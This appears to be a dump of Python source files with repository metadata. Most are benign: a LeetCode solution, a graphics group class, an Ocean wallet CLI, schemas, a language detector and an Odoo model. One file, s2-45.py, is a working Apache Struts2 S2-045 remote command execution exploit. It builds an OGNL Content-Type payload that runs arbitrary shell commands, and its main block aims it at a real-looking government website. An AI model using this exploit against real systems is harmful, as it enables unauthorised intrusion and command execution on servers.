print("发送失败:"+ str(e)) | 24.781818 | 104 | 0.685987 | 180 | 1,363 | 5.161111 | 0.572222 | 0.017223 | 0.041981 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028644 | 0.129127 | 1,363 | 55 | 105 | 24.781818 | 0.754002 | 0.09391 | 0 | 0 | 0 | 0.026316 | 0.285134 | 0.124289 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.026316 | 0.105263 | null | null | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a36e802cfc7def6cead77254887144e38e9206da | 457 | py | Python | 0844_BackspaceStringCompare.py | taro-masuda/leetcode | 39739e9fec7c66513b114c740ef982ccc09dc39f | [
"MIT"
] | null | null | null | 0844_BackspaceStringCompare.py | taro-masuda/leetcode | 39739e9fec7c66513b114c740ef982ccc09dc39f | [
"MIT"
] | null | null | null | 0844_BackspaceStringCompare.py | taro-masuda/leetcode | 39739e9fec7c66513b114c740ef982ccc09dc39f | [
"MIT"
] | 1 | 2020-03-18T05:23:40.000Z | 2020-03-18T05:23:40.000Z | class Solution:
def backspaceCompare(self, S: str, T: str) -> bool:
s = []; t = []
for i in range(len(S)):
if S[i] == "#":
if len(s) > 0:
s.pop(-1)
else:
s.append(S[i])
for i in range(len(T)):
if T[i] == "#":
if len(t) > 0:
t.pop(-1)
else:
t.append(T[i])
return s == t
| 26.882353 | 55 | 0.319475 | 57 | 457 | 2.561404 | 0.368421 | 0.027397 | 0.082192 | 0.150685 | 0.191781 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018265 | 0.520788 | 457 | 16 | 56 | 28.5625 | 0.648402 | 0 | 0 | 0.125 | 0 | 0 | 0.004376 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0 | 0 | 0.1875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a36f7eea6ef24d0f6b6fdf9e851a832919ac22fc | 1,371 | py | Python | jygsaw/group.py | talwai/jygsaw | 70847c797ff1fb3034bf9d6f95fa6dce1b9056f7 | [
"WTFPL"
] | 2 | 2017-11-21T03:04:47.000Z | 2020-03-10T11:05:15.000Z | jygsaw/group.py | talwai/jygsaw | 70847c797ff1fb3034bf9d6f95fa6dce1b9056f7 | [
"WTFPL"
] | null | null | null | jygsaw/group.py | talwai/jygsaw | 70847c797ff1fb3034bf9d6f95fa6dce1b9056f7 | [
"WTFPL"
] | null | null | null | """
A Group is a convenient way to manage a group of GraphicsObjects.
"""
from graphicsobject import *
from shape import Shape
class Group():
"""
A Group object will hold a list of shapes, text, images and other objects, that are grouped together for convenience.
"""
def __init__(self, *objects):
"""Create a Group object, containing a variable number of objects."""
self.group = []
for o in objects:
assert (isinstance(o, Shape) or isinstance(o,
GraphicsObject)), "%s is not Shape " % o
self.group.append(o)
def __len__(self):
return len(self.group)
def remove(self, *objects):
"""Removes all specified objects from the :py:class:`~jygsaw.group.Group` """
for o in objects:
self.group.remove(o)
def append(self, *objects):
"""Appends all specified objects to the :py:class:`~jygsaw.group.Group` ."""
for o in objects:
assert (isinstance(o, Shape) or isinstance(o,
GraphicsObject)), "%s is not Shape" % o
self.group.append(o)
def move(self, deltaX, deltaY):
"""Moves all objects in the :py:class:`~jygsaw.group.Group` by calling :py:meth:`jygsaw.graphics.move` on each element within it. """
for o in self.group:
o.move(deltaX, deltaY)
| 32.642857 | 141 | 0.603209 | 180 | 1,371 | 4.55 | 0.377778 | 0.065934 | 0.029304 | 0.040293 | 0.344322 | 0.344322 | 0.312576 | 0.312576 | 0.312576 | 0.312576 | 0 | 0 | 0.282276 | 1,371 | 41 | 142 | 33.439024 | 0.832317 | 0.378556 | 0 | 0.409091 | 0 | 0 | 0.038319 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 1 | 0.227273 | false | 0 | 0.090909 | 0.045455 | 0.409091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a370857b060f7f1d08fab12ce57d3d4ecfea38e5 | 18,873 | py | Python | wallet_manager/command_processor.py | DEX-Company/wallet-manager | bafb434a8f7b2277234e26b9ffde3237a6016ce6 | [
"Apache-2.0"
] | null | null | null | wallet_manager/command_processor.py | DEX-Company/wallet-manager | bafb434a8f7b2277234e26b9ffde3237a6016ce6 | [
"Apache-2.0"
] | null | null | null | wallet_manager/command_processor.py | DEX-Company/wallet-manager | bafb434a8f7b2277234e26b9ffde3237a6016ce6 | [
"Apache-2.0"
] | null | null | null | import inspect
import re
import os.path
import json
import secrets
import time
import logging
import sys
from web3 import (
Web3,
HTTPProvider
)
from eth_account import Account as EthAccount
from starfish import Ocean
from starfish.account import Account as OceanAccount
from wallet_manager.wallet_manager import WalletManager
from wallet_manager import logger
DEFAULT_REQUEST_TOKEN_AMOUNT = 10
class CommandProcessError(Exception):
pass
class CommandProcessor():
NETWORK_NAMES = {
'local': {
'description': 'No network, only access to local account setup',
},
'spree': {
'description': 'Spree network running on a local barge',
'url': 'http://localhost:8545',
'faucet_account' : ['0x068Ed00cF0441e4829D9784fCBe7b9e26D4BD8d0', 'secret'],
},
'nile': {
'description': 'Nile network access to remote network node',
'url': 'https://nile.dev-ocean.com',
'faucet_url' : 'https://faucet.nile.dev-ocean.com/faucet',
},
'pacific': {
'description': 'Pacific network access to remote network node',
'url': 'https://pacific.oceanprotocol.com',
'faucet_url' : 'https://faucet.oceanprotocol.com/faucet',
},
'duero': {
'description': 'Duero network access to remote network node',
'url': 'https://duero.dev-ocean.com',
'faucet_url' : 'https://faucet.duero.dev-ocean.com/faucet',
},
'host': {
'description': 'Local node running on barge',
'url': 'http://localhost:8545',
}
}
def __init__(self, key_chain_filename=None):
self._commands = None
self._output = []
self._wallet = WalletManager(key_chain_filename=key_chain_filename)
def document_new(sef):
return {
'description': 'Create account local and host',
'params' :[
'new <password> [local]',
'new <password> <network_name or url>',
],
}
def command_new(self):
address = ''
password = self._validate_password(1)
network_name = self._validate_network_name_url(2, 'local')
if network_name == 'local':
address = self._wallet.new_account(password)
else:
node_url = self._validate_network_name_to_value(network_name)
address = self._wallet.new_account(password, node_url)
self._add_output(address)
def document_delete(self):
return {
'description': 'Delete account on local and host',
'params': [
'delete <address> <password> [local]',
'delete <address> <password> <network_name or url>',
]
}
def command_delete(self):
address = self._validate_address(1)
password = self._validate_password(2)
network_name = self._validate_network_name_url(3, 'local')
if network_name == 'local':
result = self._wallet.delete_account(address, password)
else:
node_url = self._validate_network_name_to_value(network_name)
self._wallet.delete_account(address, password, node_url)
self._add_output(f'delete account {address}')
def document_copy(self):
return [
{
'description': 'Copy local account to host',
'params': [
'copy local <local_address> <password> <network_name or url>',
],
},
{
'description': 'Copy host account to local',
'params': [
'copy <network_name or url> <host_address> <password> [local]',
],
}
]
def command_copy(self):
pass
def document_list(self):
return {
'description': 'List accounts on local and host',
'params': [
'list [local]',
'list <network_name or url>',
],
}
def command_list(self):
result = None
network_name = self._validate_network_name_url(1, 'local')
if network_name == 'local':
result = self._wallet.list_accounts()
else:
node_url = self._validate_network_name_to_value(network_name)
result = self._wallet.list_accounts(node_url)
self._add_output(result)
def document_export(self):
return {
'description': 'Export local and host account to JSON or private key',
'params': [
'[--as_json] [--as_key] export <address> <password> [local]',
'[--as_json] [--as_key] export <address> <password> <network_name or url>',
],
}
def command_export(self):
address = self._validate_address(1)
password = self._validate_password(2)
network_name = self._validate_network_name_url(3, 'local')
if network_name == 'local':
result = self._wallet.export_account_json(address, password)
else:
node_url = self._validate_network_name_to_value(network_name)
result = self._wallet.export_account_json(address, password, node_url)
self._add_output(f'Address {address} key:')
self._add_output(result)
def document_import(self):
return {
'description': 'Import local and host account from JSON key file, or private key',
'params': [
'[--as_json] [--as_key] import <json_file or string> <password> [local]',
'[--as_json] [--as_key] import <json_file or string> <password> <network_name or url>',
],
}
def command_import(self):
json_text = self._validate_json_text(1)
password = self._validate_password(2)
network_name = self._validate_network_name_url(3, 'local')
if network_name == 'local':
result = self._wallet.import_account_json(json_text, password)
else:
node_url = self._validate_network_name_to_value(network_name)
result = self._wallet.import_account_json(json_text, password, node_url)
def document_password(self):
return {
'description': 'Change account password on local and host',
'params': [
'password <address> <old_password> <new_password> [local]',
'password <address> <old_password> <new_password> <network_name or url>',
],
}
def command_password(self):
pass
def document_get(self):
return [
{
'description': 'Get ether from faucet. The amount is only used in local spree network',
'params': [
'get ether <address> <network_name or faucet url> [amount]',
],
},
{
'description': 'Get Ocean tokens on test networks, using a temporary transfer account to request tokens',
'params': [
'get tokens <address> <network_name or url> [amount]',
],
}
]
def command_get(self):
sub_command = self._validate_sub_command(1, ['ether', 'tokens'])
address = self._validate_address(2)
network_name = self._validate_network_name_url(3)
amount = self._validate_amount(4, DEFAULT_REQUEST_TOKEN_AMOUNT)
if sub_command == 'tokens':
node_url = self._validate_network_name_to_value(network_name)
password = secrets.token_hex(32)
request_address = self._wallet.new_account(password, node_url)
node_status = self._wallet.get_chain_status(node_url)
if node_status and not node_status['blockGap'] is None:
self._add_output(f'Please wait: The local node is not yet in sync')
return
logger.info(f'created temp account {request_address}')
ocean = Ocean(keeper_url=node_url)
account = OceanAccount(ocean, request_address, password)
chain_name = self._wallet.get_chain_name(node_url)
logger.debug(f'chain name is {chain_name}')
faucet_url = self._validate_network_name_to_value(chain_name, False, 'faucet_url')
logger.debug(f'requesting ether from faucet at {faucet_url}')
self._wallet.get_ether(request_address, faucet_url)
logger.debug('wating for ether to be available in register account')
while True:
account = OceanAccount(ocean, request_address, password)
if account.ether_balance > 0:
break
time.sleep(1)
logger.debug(f'{request_address} ether tokens: {account.ether_balance}')
logger.debug('requesting ocean tokens')
account.unlock(password)
account.request_tokens(amount)
logger.debug('waiting for ocean tokens to be available in request account')
while True:
account = OceanAccount(ocean, request_address, password)
if account.ocean_balance > 0:
break
time.sleep(1)
logger.debug(f'{request_address} ocean tokens: {account.ocean_balance}')
logger.debug(f'{request_address} ether: {account.ether_balance}')
node_status = self._wallet.get_chain_status(node_url)
if node_status and not node_status['blockGap'] is None:
self._add_output(f'Please wait: The local node is not yet in sync')
return
logger.debug(f'transfer {amount} from {request_address} to {address}')
time.sleep(2)
account.unlock(password)
account.transfer_token(address, amount)
ether_amount = 0
if account.ether_balance > 0:
ether_amount = float(account.ether_balance) - 0.0000000001
account.transfer_ether(address, ether_amount)
# delete the request account
self._wallet.delete_account(request_address, password, node_url)
self._add_output(f'sent {amount} ocean tokens and {ether_amount:.4f} ether to account {address}')
elif sub_command == 'ether':
node_url = self._validate_network_name_to_value(network_name)
chain_name = self._wallet.get_chain_name(node_url)
logger.debug(f'chain name is {chain_name}')
faucet_url = self._validate_network_name_to_value(chain_name, False, 'faucet_url')
if faucet_url:
self._wallet.get_ether(address, faucet_url)
ocean = Ocean(keeper_url=node_url)
account = OceanAccount(ocean, address)
self._add_output(f'{address} ether : {account.ether_balance}')
return
faucet_account = self._validate_network_name_to_value(network_name, False, 'faucet_account')
if faucet_account:
# if list then it's a address/password of an account that has ether
self._wallet.send_ether(faucet_account[0], faucet_account[1], address, amount, node_url)
self._add_output(f'{address} ether : {account.ether_balance}')
return
raise CommandProcessError(f'Warning: The network name {network_name} does not have a faucet')
def document_request(self):
return [
{
'description': 'Request Ocean tokens on a test network',
'params': [
'request tokens <address> <password> <network_name or url> [amount]',
],
}
]
def command_request(self):
sub_command = self._validate_sub_command(1, ['tokens'])
address = self._validate_address(2)
password = self._validate_password(3)
network_name = self._validate_network_name_url(4)
amount = self._validate_amount(5, DEFAULT_REQUEST_TOKEN_AMOUNT)
node_url = self._validate_network_name_to_value(network_name)
ocean = Ocean(keeper_url=node_url)
account = OceanAccount(ocean, address)
account.unlock(password)
account.request_tokens(amount)
self._add_output(f'{address} ocean tokens: {account.ocean_balance}')
def document_balance(self):
return {
'description': 'Show the ether and Ocean token balance',
'params': [
'balance <address> <network_name or faucet url>',
],
}
def command_balance(self):
address = self._validate_address(1)
network_name = self._validate_network_name_url(2)
node_url = self._validate_network_name_to_value(network_name)
ocean = Ocean(keeper_url=node_url)
account = OceanAccount(ocean, address)
self._add_output(f'{address} ocean tokens: {account.ocean_balance}')
self._add_output(f'{address} ether: {account.ether_balance}')
def document_send(self):
return [
{
'description': 'Transfer Ocean tokens to another account',
'params': [
'send tokens <from_address> <password> <network_name or url> <to_address> <amount>',
],
},
{
'description': 'Transfer Ocean ether to another account',
'params': [
'send ether <from_address> <password> <network_name or url> <to_address> <amount>',
],
}
]
def command_send(self):
sub_command = self._validate_sub_command(1, ['ether', 'tokens'])
from_address = self._validate_address(2, field_name='from_address')
password = self._validate_password(3)
network_name = self._validate_network_name_url(4)
node_url = self._validate_network_name_to_value(network_name)
to_address = self._validate_address(5, field_name='to_address')
amount = self._validate_amount(6)
if sub_command == 'tokens':
ocean = Ocean(keeper_url=node_url)
account = OceanAccount(ocean, from_address)
account.unlock(password)
account.transfer_token(to_address, amount)
elif sub_command == 'ether':
self._wallet.send_ether(from_address, password, to_address, amount, node_url)
def command_test(self):
print(self._commands)
def process(self, commands):
self._commands = commands
method_name = f'command_{commands[0]}'
if hasattr(self, method_name):
method = getattr(self, method_name)
method()
else:
raise CommandProcessError(f'Invalid comamnd "{commands[0]}"')
def command_document_list(self, app_name):
items = []
for name in dir(self):
if re.match('^document_', name):
method = getattr(self, name)
values = method()
if isinstance(values, list):
for value in values:
items += self._expand_document_item(app_name, value)
else:
items += self._expand_document_item(app_name, values)
return items
def _validate_password(self, index,):
password = None
if index < len(self._commands):
password = self._commands[index]
if not isinstance(password, str):
raise CommandProcessError(f'Please provide a password')
return password
def _validate_network_name_url(self, index, default=None):
network_name = default
if index < len(self._commands):
network_name = self._commands[index]
else:
raise CommandProcessError(f'Please provide a network name')
return network_name
def _validate_address(self, index, field_name=None):
if field_name is None:
field_name = 'address'
if index < len(self._commands):
address = self._commands[index]
if Web3.isAddress(address):
return address
else:
raise CommandProcessError(f'"{address}" is not a vaild account {field_name}')
else:
raise CommandProcessError(f'Please provide an address name')
def _validate_json_text(self, index):
if index < len(self._commands):
json_text = self._commands[index]
if os.path.exists(json_text):
with open(json_text, 'r') as fp:
json_text = fp.read()
try:
data = json.loads(json_text)
except json.decoder.JSONDecodeError:
raise CommandProcessError(f'Please provide valid json key file or text')
return json_text
else:
raise CommandProcessError(f'Please provide json text or filename')
def _validate_network_name_to_value(self, network_name, validate=True, name=None):
value = None
if name is None:
name = 'url'
if network_name.lower() in self.NETWORK_NAMES:
value = self.NETWORK_NAMES[network_name.lower()][name]
if re.match('^http', network_name) or re.match('^/w+\.', network_name):
value = network_name
if value is None and validate:
raise CommandProcessError(f'Cannot resolve network name "{network_name}" to a value')
return value
def _validate_sub_command(self, index, command_list):
command_list_text = ','.join(command_list)
if index < len(self._commands):
sub_command = self._commands[index]
if sub_command in command_list:
return sub_command
raise CommandProcessError(f'Invalid command "{sub_command}", one of the following commands "{command_list_text}"')
else:
raise CommandProcessError(f'Please provide one of the following commands "{command_list_text}"')
def _validate_amount(self, index, default_value=None):
amount = default_value
if index < len(self._commands):
amount = int(self._commands[index])
if amount is None:
raise CommandProcessError(f'Please provide an amount')
return amount
def _expand_document_item(self, app_name, value):
items = []
items.append(f'\n{value["description"]}')
for param in value['params']:
items.append(f' {app_name} {param}')
return items
def _add_output(self, text):
if isinstance(text, str):
self._output.append(text)
else:
for value in text:
self._output.append(value)
@property
def output(self):
return self._output
| 38.993802 | 126 | 0.595189 | 2,085 | 18,873 | 5.127578 | 0.105036 | 0.079226 | 0.042653 | 0.04733 | 0.524928 | 0.461229 | 0.384716 | 0.33879 | 0.269011 | 0.23908 | 0 | 0.00705 | 0.308536 | 18,873 | 483 | 127 | 39.074534 | 0.812184 | 0.004875 | 0 | 0.35461 | 0 | 0 | 0.231867 | 0.016668 | 0 | 0 | 0.002237 | 0 | 0 | 1 | 0.085106 | false | 0.122931 | 0.049645 | 0.028369 | 0.200946 | 0.002364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
a370fc8bae2f0332499a9e7de9b11bf1e10df407 | 2,790 | py | Python | backend/bigeye/schemas/schemas.py | Astropilot/BigEye | 4e1c246391c5f6e1c8ea4e4c35ee5fec209960a6 | [
"MIT"
] | null | null | null | backend/bigeye/schemas/schemas.py | Astropilot/BigEye | 4e1c246391c5f6e1c8ea4e4c35ee5fec209960a6 | [
"MIT"
] | null | null | null | backend/bigeye/schemas/schemas.py | Astropilot/BigEye | 4e1c246391c5f6e1c8ea4e4c35ee5fec209960a6 | [
"MIT"
] | null | null | null | from marshmallow import fields, validate
from marshmallow_enum import EnumField
from bigeye.models.base import ma
from bigeye.models.user import UserRoles
from bigeye.models.challenge import ChallengeDifficulty
class ChallengeCategorySchema(ma.Schema):
id = fields.Integer(dump_only=True)
name = fields.String(required=True, validate=validate.Regexp('^[a-zA-Z0-9_]{3,40}$'))
total_challenges = fields.Integer(dump_only=True)
total_challenges_resolved = fields.Integer(dump_only=True)
class ChallengeSchema(ma.Schema):
id = fields.Integer(dump_only=True)
title = fields.String(required=True)
description = fields.String(required=False, missing=None)
difficulty = EnumField(ChallengeDifficulty, required=True)
flag = fields.String(load_only=True, required=True)
category = fields.Nested(ChallengeCategorySchema, dump_only=True)
points = fields.Integer(required=True)
created_at = fields.DateTime(dump_only=True)
resource_link = fields.String(dump_only=True)
link = fields.String(load_only=True, required=False, validate=validate.URL(relative=False))
hint = fields.String(required=False, missing=None)
is_resolved = fields.Boolean(dump_only=True)
class ChallengeResolveSchema(ma.Schema):
id = fields.Integer(dump_only=True)
user = fields.Nested(lambda: UserSchema(only=('id', 'email', 'username', 'role')), dump_only=True)
challenge = fields.Nested(ChallengeSchema, dump_only=True)
points = fields.Integer(dump_only=True)
resolved_at = fields.DateTime(dump_only=True)
class UserSchema(ma.Schema):
id = fields.Integer(dump_only=True)
created_at = fields.DateTime(dump_only=True)
email = fields.String(required=True, validate=validate.Email())
username = fields.String(required=True, validate=validate.Regexp('^[a-zA-Z0-9_]{3,20}$'))
role = EnumField(UserRoles, dump_only=True)
password = fields.String(load_only=True, validate=validate.Regexp('^(?=.*[a-z])(?=.*[A-Z])(?=.*[0-9])(?=.*[!@#$%^&*_=+-]).{8,}$'))
token = fields.String(dump_only=True)
total_points = fields.Integer(dump_only=True)
total_points_solved = fields.Integer(dump_only=True)
challenges_resolved = fields.List(fields.Nested(ChallengeResolveSchema(exclude=('user',))), dump_only=True)
user_schema = UserSchema(only=('id', 'username', 'role', 'created_at'))
user_schema_own = UserSchema()
users_schema = UserSchema(many=True, only=('id', 'username', 'created_at', 'total_points_solved', 'challenges_resolved'))
challengecategory_schema = ChallengeCategorySchema(many=True)
challengecategorysingle_schema = ChallengeCategorySchema()
challenges_schema = ChallengeSchema(many=True, exclude=('category',))
challenge_schema = ChallengeSchema()
challengeresolve_schema = ChallengeResolveSchema()
| 45 | 134 | 0.749462 | 341 | 2,790 | 5.97654 | 0.231672 | 0.090285 | 0.117763 | 0.092738 | 0.402355 | 0.32581 | 0.157017 | 0.157017 | 0.052012 | 0.052012 | 0 | 0.005244 | 0.11147 | 2,790 | 61 | 135 | 45.737705 | 0.816862 | 0 | 0 | 0.125 | 0 | 0 | 0.076344 | 0.021505 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.020833 | 0.104167 | 0 | 0.833333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
a38ba073f85b00fee5759b368e3de80e9bf37f45 | 2,928 | py | Python | scripts/poc/structs2/s2-45.py | BenDerPan/POCs | 4ce7137ccc6d797f18193b4783929d6422437696 | [
"MIT"
] | 7 | 2017-10-07T09:46:05.000Z | 2021-08-18T07:11:19.000Z | scripts/poc/structs2/s2-45.py | BenDerPan/POCs | 4ce7137ccc6d797f18193b4783929d6422437696 | [
"MIT"
] | null | null | null | scripts/poc/structs2/s2-45.py | BenDerPan/POCs | 4ce7137ccc6d797f18193b4783929d6422437696 | [
"MIT"
] | 3 | 2017-10-08T03:26:53.000Z | 2019-03-10T15:10:11.000Z | import http.client
import urllib
import requests
from scripts.poc.poc_interface import PocInterface
class Structs2_45(PocInterface):
'''
Structs2 漏洞验证及利用实现
'''
def validate(self,url):
'''
验证指定URL是否存在Structs2 45漏洞
:param url: 需要验证的URL地址
:return: True-存在漏洞 False-不存在漏洞
'''
payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}"
headers = {}
headers["Content-Type"] = payload
r = requests.get(url, headers=headers)
if "105059592" in r.content:
return True
return False
def exploit(self,url, cmd):
'''
对存在Struct2 45漏洞的主机实现任意命令执行
:param url: 目标URL
:param cmd: 需要执行的指令
:return: 执行后的返回页面内容
'''
payload = "%{(#_='multipart/form-data')."
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?"
payload += "(#_memberAccess=#dm):"
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
payload += "(#ognlUtil.getExcludedPackageNames().clear())."
payload += "(#ognlUtil.getExcludedClasses().clear())."
payload += "(#context.setMemberAccess(#dm))))."
payload += "(#cmd='%s')." % cmd
payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
payload += "(#ros.flush())}"
try:
headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
request = urllib.Request(url, headers=headers)
page = urllib.urlopen(request).read()
except http.client.IncompleteRead as e:
page = e.partial
print(page)
return page
if __name__ == '__main__':
s=Structs2_45()
#查找潜在漏洞URL,直接谷歌 inurl .action
url="http://www.ly.gov.tw/innerIndex.action"
if s.validate(url):
s.exploit(url,'ls -lht') | 43.701493 | 539 | 0.618169 | 291 | 2,928 | 6.151203 | 0.453608 | 0.03352 | 0.046927 | 0.026816 | 0.252514 | 0.252514 | 0.212291 | 0.073743 | 0.073743 | 0 | 0 | 0.017395 | 0.195014 | 2,928 | 67 | 540 | 43.701493 | 0.742045 | 0.072404 | 0 | 0 | 0 | 0.068182 | 0.54761 | 0.487189 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.090909 | 0 | 0.227273 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a38e46758a08d8aa58e2cec40e436999a9751e25 | 3,133 | py | Python | chapter_3/exercise_43.py | Tobi-mmt/nltk-book | 42ee9fec4784f468ee3ae4aa361fd2e5b5c46b10 | [
"MIT"
] | null | null | null | chapter_3/exercise_43.py | Tobi-mmt/nltk-book | 42ee9fec4784f468ee3ae4aa361fd2e5b5c46b10 | [
"MIT"
] | null | null | null | chapter_3/exercise_43.py | Tobi-mmt/nltk-book | 42ee9fec4784f468ee3ae4aa361fd2e5b5c46b10 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Aufgaben 6, 7, 20, 21, 24, 30, 34, 39, 38, 41, 43 Bis Dienstag
# -----------------
# 43 detect language
# -----------------
import nltk, re
from nltk import word_tokenize
languages = ['Chickasaw', 'English', 'German_Deutsch', 'Greenlandic_Inuktikut', 'Hungarian_Magyar', 'Ibibio_Efik']
def word_frequency(text):
tokens = text
if type(text) == type(str('')):
tokens = word_tokenize(text)
freq = nltk.FreqDist(w.lower() for w in tokens)
return freq
def get_lang_list():
language_list = {}
for language in languages:
reference_text = nltk.corpus.udhr.words(language + '-Latin1')
language_words = word_frequency(reference_text).most_common()
language_list[language] = [word[0] for word in language_words if re.findall(r'\w', word[0])]
return language_list
def which_lang(string):
input_text = word_frequency(string).most_common()
input_text_list = [word[0] for word in input_text if re.findall(r'\w', word[0])]
language_list = get_lang_list()
result = {}
for lang in languages:
result[lang] = len(list(set(input_text_list) & set(language_list[lang])))
return 'Your Text is written in "{}"'.format(max(result, key=result.get))
input_txt = {
'german': 'Auch gibt es niemanden, der den Schmerz an sich liebt, sucht oder wünscht, nur, weil er Schmerz ist, es sei denn, es kommt zu zufälligen Umständen, in denen Mühen und Schmerz ihm große Freude bereiten können. Um ein triviales Beispiel zu nehmen, wer von uns unterzieht sich je anstrengender körperlicher Betätigung, außer um Vorteile daraus zu ziehen? Aber wer hat irgend ein Recht, einen Menschen zu tadeln, der die Entscheidung trifft, eine Freude zu genießen, die keine unangenehmen Folgen hat, oder einen, der Schmerz vermeidet, welcher keine daraus resultierende Freude nach sich zieht? Auch gibt es niemanden, der den Schmerz an sich liebt, sucht oder wünscht, nur, weil er Schmerz ist, es sei denn, es kommt zu zufälligen Umständen, in denen Mühen und Schmerz ihm große Freude bereiten können. Um ein triviales Beispiel zu nehmen, wer von uns unterzieht sich je anstrengender körperlicher Betätigung, außer um Vorteile daraus zu ziehen?',
'english': 'A wonderful serenity has taken possession of my entire soul, like these sweet mornings of spring which I enjoy with my whole heart. I am alone, and feel the charm of existence in this spot, which was created for the bliss of souls like mine. I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment; and yet I feel that I never was a greater artist than now. When, while the lovely valley teems with vapour around me, and the meridian sun strikes the upper surface of the impenetrable foliage of my trees, and but a few stray gleams steal into the inner sanctuary, I throw myself down among the tall grass by the trickling stream; and, as I lie close to the earth, a thousand unknown plants are noticed by me.'
}
print(which_lang(input_txt['english']))
| 68.108696 | 960 | 0.735078 | 490 | 3,133 | 4.630612 | 0.508163 | 0.026443 | 0.009696 | 0.010577 | 0.278537 | 0.266197 | 0.266197 | 0.250331 | 0.250331 | 0.250331 | 0 | 0.010878 | 0.178423 | 3,133 | 45 | 961 | 69.622222 | 0.870629 | 0.044686 | 0 | 0 | 0 | 0.068966 | 0.644556 | 0.007035 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103448 | false | 0 | 0.068966 | 0 | 0.275862 | 0.034483 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a39c278901ee2bd5c1dabec535b621519f966348 | 543 | py | Python | demo_hierarchy_tutorial/models/models.py | digitalsatori/odoo-demo-addons-tutorial | 8eb56156ac55f317f90bca089886c392556759c2 | [
"MIT"
] | 57 | 2020-06-22T05:28:11.000Z | 2022-03-25T08:15:08.000Z | demo_hierarchy_tutorial/models/models.py | digitalsatori/odoo-demo-addons-tutorial | 8eb56156ac55f317f90bca089886c392556759c2 | [
"MIT"
] | 2 | 2020-11-20T07:11:27.000Z | 2022-03-30T00:20:29.000Z | demo_hierarchy_tutorial/models/models.py | digitalsatori/odoo-demo-addons-tutorial | 8eb56156ac55f317f90bca089886c392556759c2 | [
"MIT"
] | 29 | 2020-07-04T15:24:01.000Z | 2022-03-28T01:29:03.000Z | from odoo import models, fields, api
class DemoHierarchyTutorial(models.Model):
_name = 'demo.hierarchy'
_description = 'Demo Hierarchy Tutorial'
name = fields.Char(string='name', index=True)
parent_id = fields.Many2one('demo.hierarchy', string='Related Partner', index=True)
parent_name = fields.Char(related='parent_id.name', readonly=True, string='Parent name')
